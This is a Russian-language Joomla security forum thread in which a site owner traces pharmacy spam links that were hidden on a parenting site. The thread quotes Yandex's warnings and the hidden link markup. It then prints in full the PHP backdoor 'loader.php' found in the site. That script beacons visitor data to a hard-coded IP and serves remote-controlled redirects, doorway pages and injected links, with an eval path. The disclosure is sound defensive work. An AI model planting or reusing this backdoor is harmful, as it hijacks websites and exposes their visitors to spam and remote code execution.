Как такое может быть? Где искать вирус или что это? - Безопасность сайтов на Joomla

Здравствуйте, подскажите как такое может быть?
Вот данные сайта http://mama-nana.ru/ из
https://www.google.com/webmasters/tools/keywords?hl=ru&siteUrl=http://mama-nana.ru/
Ключевое слово   Важность
1.   viagra
2.   cialis
3.   ребенка (формы слова: 5)   
4.   pris (формы слова: 2)   
5.   acheter
6.   месяц (формы слова: 7)   
7.   рода (формы слова: 7)   
8.   беременны (формы слова: 7)   
9.   levitra
10.   generique (формы слова: 2)   
11.   kamagra
12.   france
13.   мама (формы слова: 6)   
14.   achat (формы слова: 2)   
15.   vente
16.   pharmacie
17.   tadalafil
18.   ordonnance (формы слова: 2)   
19.   новорожденные (формы слова: 6)   
20.   20mg
Показать дополнительные ключевые слова...

Слова viagra не смог найти на сайте ни через HTML просмотр, ни через просмотр как "Просмотреть как Googlebot", ни через копирование всего сайта на комп и проверкой на вирус, а также через Total Commander поиск файлов с текстом viagra (Alt + F7).
Сразу отвечу что файла htaccess выше корневой папки нет.

Помогите найти гадский код.
Яндекс уже прислал письмо счастья:
+++++++++++++++++++++++++++++
Здравствуйте!
Наши алгоритмы обнаружили на страницах сайта mama-nana.ru, права на который Вы подтвердили в сервисе Яндекс.Вебмастер, скрытый или слабовидимый текст, недоступный пользователям сайта, и предназначенный исключительно для робота поисковой системы. В связи с этим мы вынуждены частично исключить Ваш сайт из поисковой выдачи.

Примеры страниц, на которых обнаружен скрытый текст:
http://mama-nana.ru/allmam/restoration-after-birth/hard-ship
http://mama-nana.ru/allmam/restoration-after-birth/six-week-after-birth
http://mama-nana.ru/allmam/vitamini-men-kat/prichini-avitaminoza-men

Пожалуйста, удалите скрытый текст со страниц сайта. Когда изменения будут внесены, сайт вернется в поиск автоматически.
Если у Вас возникли вопросы, вы можете задать их в службу поддержки Яндекса. Для этого воспользуйтесь этой формой.
---
С уважением,
Яндекс.Вебмастер
+++++++++++++++++++++++++++++

Я им ответил, что ничего у меня нет, на что они мне:

++++++++++++++++++++++++++++++++++++++
Здравствуйте!
  Приношу свои извинения за задержку с ответом. Фрагмент обнаруженного на сайте скрытого текста прилагаем:
  <p style="display: none;">
  <a href="http://scripts.mit.edu/~larryv/blog/?p=0">faux cialis</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=1">ou trouver du viagra a paris</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=2">generique levitra 20</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=3">vente viagra generique</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=4">commander viagra en ligne</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=5">vente cialis</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=6">viagra pharmacie belgique</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=7">ou avoir du viagra</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=8">generique cialis</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=9">prix de cialis</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=10">achat viagra en suisse</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=11">cialis in france</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=12">acheter viagra belgique</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=13">posologie du cialis</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=14">cialis dosage</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=15">tadalafil e20</a>
  <a href="http://scripts.mit.edu/~larryv/blog/?p=16">sildenafil tablets 100mg</a>
  …и т.д.
  Как я уже писал в предыдущем письме, в настоящее время эти ссылки уже не видны на сайте, поэтому после переобхода роботом страницы автоматически восстановятся в поиске.

  Скорее всего, данный вид спама появился на сайте в результате взлома. Если Вы не удаляли приведенный нами скрытый текст сами, то это значит, что он исчез из кода произвольно, и может вновь появиться там в любой момент. Рекомендуем сменить все пароли доступа и проверить сайт на наличие уязвимости.
  --
  С уважением, Платон Щукин
  Служба поддержки Яндекса
++++++++++++++++++++++++++++++++++++++

Помогите советом где копать? Пароли все сменил, касперыч ничего не видит.

Нашел: http://webcache.googleusercontent.com/search?q=cache:HGialIHDs6MJ:mama-nana.ru/allmam/birth-child/plan-birth+%22viagra+pharmacie%22+site:mama-nana.ru&cd=5&hl=ru&ct=clnk&source=www.google.com
ссылки в кеше не видны, но если в HTML виде, то ниже 1080 строки идет <!--cacheb--><p style="display: none;">
<a href="http://www.abtel.fr/?pid=434" title="cialis 2 mg">cialis 2 mg</a>
<a href="http://www.abtel.fr/?pid=433" title="cialis 50">cialis 50</a>
<a href="http://www.abtel.fr/?pid=431" title="cialis order">cialis order</a>

И так 1500 строк.
а потом в конце <a href="http://www.abtel.fr/?pid=1373" title="faut il une ordonnance pour du viagra">faut il une ordonnance pour du viagra</a>
</p><!--cachee-->
</body>
</html>
Код вставляется из  <!--cacheb--><!--cachee--> .
Но сейчас бот Google ссылок не видет проверил:
https://www.google.com/webmasters/tools/googlebot-fetch-details?hl=ru&siteUrl=http://mama-nana.ru/&path=allmam/birth-child/plan-birth&timestamp=1301694722114000&pl=eyJ0YXJnZXRJZCI6Imdvb2dsZWJvdC1mZXRjaCIsInBhcmFtcyI6eyJzaXRlVXJsIjoiaHR0cDovL21hbWEtbmFuYS5ydS8iLCJtZXNkIjoiZXlKdGRDSTZJbEpGVVZWRlUxUmZVMVZEUTBWVFUwWlZUQ0lzSW1OMElqb3hNekF4TmprME56SXlNVEkxTENKd2N5STZXMTE5IiwiaGwiOiJydSJ9fQ%3D%3D.
Видимо код вставляется по времени или еще как-нибудь.
Помогите его победить...

Народ, нашел и избавился, если кому поможет, то файл с вирусом находится
\public_html\libraries\joomla\
называется loader.php
Вот его код:
<?php
  error_reporting(0);
  set_time_limit(0);
  if (isset($_POST['system_check'])) { echo '200'; exit; }
  $remote_addr = isset($_SERVER['REMOTE_ADDR'])? $_SERVER['REMOTE_ADDR'] : 'not set';
  $http_user_agent = isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT'] : 'not set';
  $http_referer = isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER'] : 'not set';
  $request_uri = isset($_SERVER['REQUEST_URI'])? $_SERVER['REQUEST_URI'] : 'not set';
  $data = 'DOMAIN_KEY=db0b6fb5a93b694d485c3dc958c87c9a|REMOTE_ADDR='.$remote_addr.'|HTTP_USER_AGENT='.$http_user_agent.'|HTTP_REFERER='.$http_referer.'|REQUEST_URI='.$request_uri;
  $url = 'http://78.159.101.232/json/?p='.base64_encode($data);
  if ($json = get($url, 10)) {
    if ($response = json($json)) {
      if ($response['action'] == 'doorway') {
        echo base64_decode($response['content']);
        exit;
      }
      if ($response['action'] == 'redirect') {
        header('Location: '.base64_decode($response['url']));
        exit;
      }
      if ($response['action'] == 'link') {
        define('JOOMLA_CACHE', base64_decode($response['content']));
      }
    }
  }
 
  function get ($url, $timeout = 15) {
    $content = false;
    $url = parse_url($url);
    if ($socket = fsockopen($url['host'], 80, $errno, $errstr, $timeout)) {
      $query = !empty($url['query'])? $url['path'].'?'.$url['query'] : $url['path'];
      fputs($socket, "GET ".$query." HTTP/1.0\r\nHost: ".$url['host']."\r\nConnection: Close\r\n\r\n");
      $buffer = '';
      while (!feof($socket)) {
        $buffer .= fgets($socket, 1024);
      }
      fclose($socket);
      preg_match('/Content-Length: ([0-9]+)/', $buffer, $parts);
      $content = substr($buffer, - $parts[1]);
    }
    return $content;
  }
 
  function json ($json) {
    $response = false;
    if (function_exists('json_decode') && defined('JSON_FORCE_OBJECT')) {
      $response = json_decode($json, JSON_FORCE_OBJECT);
    } else {
      $comment = false;
      $out = '$response=';
      for ($i=0; $i<strlen($json); $i++) {
        if (!$comment) {
          if (($json[$i] == '{') || ($json[$i] == '['))       $out .= ' array(';
          else if (($json[$i] == '}') || ($json[$i] == ']'))  $out .= ')';
          else if ($json[$i] == ':')                          $out .= '=>';
          else                                                $out .= $json[$i];
        } else {
          $out .= $json[$i];
        }
        if ($json[$i] == '"' && $json[($i-1)]!="\\")  $comment = !$comment;
      }
      eval($out . ';');
      foreach ($response as $key => $value) {
        $response[$key] = stripslashes($value);
      }
    }
    return $response;
  }
?>

Написал быстренько скриптик удалять всю эту пакость
Если скрипт помог - можете донейтить на ЯД 41001251003183 или R545653827015 или Z267652009871